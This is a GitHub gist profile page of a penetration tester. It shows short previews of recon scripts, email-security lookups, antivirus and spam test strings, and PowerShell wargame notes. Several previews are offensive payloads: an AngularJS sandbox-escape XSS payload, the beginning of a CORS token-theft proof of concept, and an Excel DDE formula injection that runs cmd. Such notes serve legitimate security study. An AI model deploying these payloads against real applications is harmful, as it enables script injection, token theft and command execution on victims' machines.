Skip to content

Instantly share code, notes, and snippets.

View SleepyLctl's full-sized avatar

Petr Pospíšil SleepyLctl

9 followers · 21 following
View GitHub Profile
@SleepyLctl
SleepyLctl / smb_ver.sh
Created November 14, 2019 11:20
Script for getting SMB Version thru tcpdump - not my work
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""
@SleepyLctl
SleepyLctl / AngularJS SandBox Escapes
Created October 24, 2018 08:55
https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
List of Sandbox bypasses
1.0.1 - 1.1.5
Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
@SleepyLctl
SleepyLctl / enumeration.md
Last active March 5, 2019 12:03
OSCP Get your shit ready...
@SleepyLctl
SleepyLctl / subdomains.sh
Created September 19, 2018 08:59
DNS Subdomain Enumeration
#!/bin/bash
dot="."
while read subdomain; do
host $subdomain$dot$1 | grep "has address"
done < $2
@SleepyLctl
SleepyLctl / Email Infrastructure
Created July 31, 2018 13:02
Email Architecture Overview
MUA – Mail User Agent e.g. Outlook, Mozilla Thunderbird; Downloads emails from MDA via POP3/IMAP; Sends emails via tcp:587;
MTA – Mail Transfer Agent e.g. Kaspersky Secure Mail Gateway - SMTP server - listens tcp:25 and comunnicates with another MTA; placed in DMZ;
MDA – Mail Delivery Agent e.g. MS Exchange, IceWarp - POP3/IMAP server (local delivery server) - communicates with MTA via tcp:25; stores/forwards emails;
Email NetFlow
################
MUA -> MDA(tcp:587) -> MTA(tcp:25) -> INTERNET -> MTA(tcp:25) -> MTA(tcp:25) -> MUA(tcp:110/143)
@SleepyLctl
SleepyLctl / smtp_flags.txt
Last active July 25, 2018 08:53
SMTP Flags SPF, DKIM, DMARC
################################################ Automatic Checks
$ https://mxtoolbox.com/SuperTool.aspx
################################################ SPF Dig Lookup
$ dig domain.com txt
################################################ DMARC Dig Lookup
$ dig _dmarc.example.org txt
################################################ DKIM Dig Lookup - selector must be known - found in email header - DKIM-Signature
@SleepyLctl
SleepyLctl / test.txt
Created July 16, 2018 05:56
Test Strings
EICAR Test String
(anti-virus) X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
When an anti-virus program scans this file, it reports that it finds the EICAR-STANDARD-AV-TEST-FILE virus.
GTUBE Test String
(spam) XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X
For further information, see: http://spamassassin.apache.org/gtube/.
@SleepyLctl
SleepyLctl / lol.ps1
Created July 11, 2018 09:32
PowerShell Basics - Century
century.underthewire.tech:6009
1. Version of Powershell Build = 10.0.14409.1012
$PSVersionTable
2. Download a file = invoke-webrequest80
Invoke-WebRequest
3. Number of files on the desktop.
Get-ChildItem ..\desktop\ | Measure-Object
@SleepyLctl
SleepyLctl / CORS_poc.html
Last active August 14, 2018 06:07
CORS Token PoC
<!DOCTYPE html>
<html>
<head>
<script>
function hack()
{
var xmlhttp;
if (window.XMLHttpRequest)
{
xmlhttp=new XMLHttpRequest();
@SleepyLctl
SleepyLctl / Excel Injections
Last active July 31, 2018 07:00
Injections
Excel Formula Injection
@SUM(1+1)*cmd|' /C calc'!A0